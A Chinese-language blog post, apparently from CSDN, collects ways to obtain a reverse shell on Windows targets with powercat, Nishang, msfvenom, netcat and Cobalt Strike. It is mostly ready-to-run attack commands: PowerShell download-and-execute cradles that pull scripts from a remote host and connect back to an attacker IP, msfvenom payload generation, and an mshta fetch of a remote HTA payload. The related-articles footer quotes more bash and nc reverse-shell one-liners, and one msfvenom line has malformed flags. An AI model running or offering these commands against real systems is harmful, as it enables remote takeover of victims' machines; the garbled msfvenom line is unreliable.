Windows系统反弹shell常见方法总结

最新推荐文章于 2024-10-19 18:15:48 发布
最新推荐文章于 2024-10-19 18:15:48 发布
阅读量3.8k 收藏 13
点赞数
分类专栏: 渗透测试 文章标签: 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guo15890025019/article/details/118806251
版权

目录

一、Powercat反弹shell

powercat下载: powercat.
powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种:
其一:下载powercat.ps1至本地,并加载
在这里插入图片描述
其二:从URL加载
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.8.14/powercat.ps1')

攻击者开启监听
在这里插入图片描述
目标机cmd下执行反弹shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.8.14/powercat.ps1');powercat -c 192.168.110.128 -p 6677 -e cmd
在这里插入图片描述
攻击机查看反弹shell情况,反弹成功
在这里插入图片描述

二、Nishang反弹shell

Nishang下载: Nishang.
Nishang 是一个脚本和有效载荷的框架和集合,它支持使用 PowerShell 进行攻击性安全、渗透测试和红队。Nishang 在渗透测试的所有阶段都很有用。

攻击者开启监听
在这里插入图片描述
目标机cmd下执行反弹shell(Invoke-PowerShellTcp.ps1函数取至于/nishang-master/Shells目录下)
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.14/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.110.128 -port 6666
在这里插入图片描述
攻击机上查看反弹情况,反弹成功
在这里插入图片描述

三、UDP反弹shell

利用方法同第二部分,利用/nishang/shells文件夹中的Invoke-PowerShellUdp.ps1文件

攻击机开启监听
nc -lvup 6677
在这里插入图片描述

目标机执行反弹shell
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.14/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.110.128 -port 6677

在这里插入图片描述
攻击机查看反弹成功
在这里插入图片描述

四、Metasploit反弹shell

方法一:
利用msfvenom制作.exe格式的反弹shell木马文件
msfvenom -p windows/meterpreter/reverse_tcp -l lhost=192.168.110.128 -p lport= 6677 -f exe -o 716.exe
在这里插入图片描述
攻击机开启监听
在这里插入图片描述
目标机上传716.exe,并执行
在这里插入图片描述
攻击机查看已建立连接
在这里插入图片描述
方法二:
使用 msfvenom -l 结合关键字过滤(如cmd/windows/reverse),找出我们需要的各类反弹一句话payload的路径信息。
msfvenom -l payload | grep 'cmd/windows/reverse'
在这里插入图片描述
使用如下的命令生成反弹一句话,然后复制粘贴到靶机上运行即可。
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.110.128 lport=4444

在这里插入图片描述
攻击机开启监听
在这里插入图片描述
目标机cmd下执行反弹shell
在这里插入图片描述

查看攻击机反弹成功
在这里插入图片描述

五、nc反弹

攻击机开启监听
在这里插入图片描述
目标机执行反弹shell
在这里插入图片描述
攻击机查看反弹成功
在这里插入图片描述

六、CS反弹

攻击机开启监听
在这里插入图片描述
生成payload, Attacks---->Packages---->HTML Application

在这里插入图片描述
在这里插入图片描述
设置Host File
在这里插入图片描述
目的靶机上执行mshta http://192.168.8.137:80/download/file.ext

在这里插入图片描述
攻击机CS上查看建立连接
在这里插入图片描述

Passer798
关注
专栏目录
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4793
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
qq_51577576的博客
08-03 1940
攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell。...
Windows反弹shell测试
oscarli的博客
05-30 366
windows反弹shell测试记录
各种反弹shell方式
最新发布
Lpyzdzs的博客
10-19 484
反弹shell
Windows反弹Shell
qq_62073002的博客
04-26 1129
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2123
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
Windows 反弹shell方法
weixin_53747497的博客
07-12 3083
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
Windows 反弹 Shell
weixin_30414245的博客
08-03 581
NC 反弹 shell 攻击场景:   Victim IP: 192.168.2.10   Attacker IP:192.168.2.11 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cm...
常见反弹shell方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
windows反弹shell方法
09-21
Windows反弹shell有多种方法,其中包括Powercat反弹shell、Nishang反弹shell和使用邮件地址作为反弹shell的服务器地址。 Powercat反弹shell是一种通过PowerShell实现的方法。攻击者可以在目标机器的cmd中执行命令,...
常用的一句话反弹shell总结
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
cmd反弹shell提权
10-24
cmd反弹shell提权
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
渗透测试-window反弹shell
lza20001103的博客
05-11 4992
window反弹shell
Window下的反弹shell
qq_58000413的博客
05-05 1301
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
Windows反弹shell的方式
ws1813004226的博客
05-25 7206
一、Windows反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
windows 反弹shell_windows版瑞士军刀powercat之牛刀小试
weixin_39963080的博客
12-12 257
时间过的太快,又到深夜了,又要开始刷抖音或网抑云了。今天一位同事因为晚上没有加班,去拿20块钱的夜宵,被举报了。这种在领导面前打小报告的人,职场里面非常多。同事之间要多堤防着,保不准哪一天其中有人会出卖你。这篇文章做了4个小实验:powercat 正向shellwindows-linux)powercat 反向shellwindows-linux)powercat 反向powershell(w...
一句话反弹shell
Jim的博客
08-21 4576
1.Bash: •bash–i >&/dev/tcp/10.0.0.1/80800>&1  //bash –i打开一个交互的bash, /dev/tcp建立一个socket连接, >&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。 •Linuxshell文件描述符: •1.标准输入:代码为0,使用 •2.标准输出:代码为1,使用>或>>; •3.标准错误输出:
简单易上手!Windows反弹shell实现
weixin_54475173的博客
01-02 521
Windows反弹shell
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值